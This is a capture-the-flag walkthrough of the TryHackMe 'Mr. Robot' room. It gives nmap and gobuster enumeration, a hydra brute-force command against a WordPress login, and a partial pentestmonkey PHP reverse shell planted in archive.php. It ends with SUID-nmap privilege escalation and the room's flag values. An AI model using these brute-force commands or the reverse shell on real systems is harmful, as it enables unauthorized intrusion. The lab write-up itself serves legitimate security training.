../

Mr. Robot

Banner

Scanning

First let’s first start with our Nmap scan.

nmap -sV -sC -A -O 10.10.123.2

nmap_img

A website seems to be opened in port 80. Let’s go and visit that. website_img

You can just explore more about the web. Lets look at a common file in websites robot.txt.
we can see 2 files namely, fsocity.dic and key-1-of-3.txt. Let’s download and see.

dwnld_img

fsocity.dic is a dictionary file. key-1-of-3.txt is the first flag. >073403c8a58a1f80d943455fb30724b9 — First Flag

Web Enumeration

Let’s use gobuster to find hidden directories of the

gobuster -w /usr/share/wordlists/dirbuster/directory-medium-2.3.txt -u http://10.10.123.2

gobutser_img

Found wp-login, which is the login page of the wordpress dashboard.
To bruteforce and gain acess to the wordpress dashboard we are using the fsocity.dic file as the wordlist. There are 2 ways to do this,

1. BRUTEFORCING TO FIND THE USERNAME:

hydra -L fsocity.dic -p test 10.10.123.2 http-post-form “/wp-login:log=^USER^&pwd=^PWD^:Invalid username” -t 30

We got Elliot as the username.

2. BRUTEFORCING TO FIND THE PASSWORD:

For this i will use burp suite.

we got ER28-0652 as the password
Now let’s log in to wordpress.

Now let’s use wordpress to get a reverse shell. Get the php reverse shell of pentest monkey in github.

Revshell

array(“pipe”, “r”), // stdin is a pipe that the child will read from
1 => array(“pipe”, “w”), // stdout is a pipe that the child will write to
2 => array(“pipe”, “w”) // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit(“ERROR: Can’t spawn shell”);
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won’t
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit(“Successfully opened reverse shell to $ip:$port”);

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit(“ERROR: Shell connection terminated”);
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit(“ERROR: Shell process terminated”);
break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process’s STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit(“SOCK READ”);
$input = fread($sock, $chunk_size);
if ($debug) printit(“SOCK: $input”);
fwrite($pipes[0], $input);
}

// If we can read from the process’s STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit(“STDOUT READ”);
$input = fread($pipes[1], $chunk_size);
if ($debug) printit(“STDOUT: $input”);
fwrite($sock, $input);
}

// If we can read from the process’s STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit(“STDERR READ”);
$input = fread($pipes[2], $chunk_size);
if ($debug) printit(“STDERR: $input”);
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we’ve daemonised ourself
// (I can’t figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print “$string\n”;
}
}

?>

Put the revserse shell into a page in the website. Put it to the archive.php file and save it.

Now open up a listener and acess the page.

We can see the second flag.

But we can’t open the key file but we have another file named password.ra2-md5 we can open it.

Hash Cracking

Inside this file there is an MD5 hash now let’s crack it. I will use crackstation to crack this.

the hash is : abcdefghijklmnopqrstuvwxyz

Now we can switch to the robot user and grab the second flag.

822c73956184f694993bede3eb39f959 — Second Flag

Privesc

Now we need to privilege escalate.I tried uploading a script like LinPeas here but the transfer failed.I also tried running sudo -l command but the user robot was not in sudoer’s list. So lets run this command which searches for all files having SUID bit set.

find / -perm +6000 2>/dev/null | grep ‘/bin/’

‘/usr/local/bin/nmap’ is not ordinary.
After finding that nmap is vulnerable. Lets find a privesc method for nmap in gtfobins.

04787ddef27c3dee1ee161b21670b4e4 — Third Flag

Tags: /mrrobot/ /tryhackme/ /ctf/ /wordpress/ /web/ /enumeration/ /vulnhub/ /suid/ /revshell/ /burp/ /crackstation/ /find/ /gobuster/ /hash/ /hashes/ /hydra/ /nmap/ /php/ /privesc/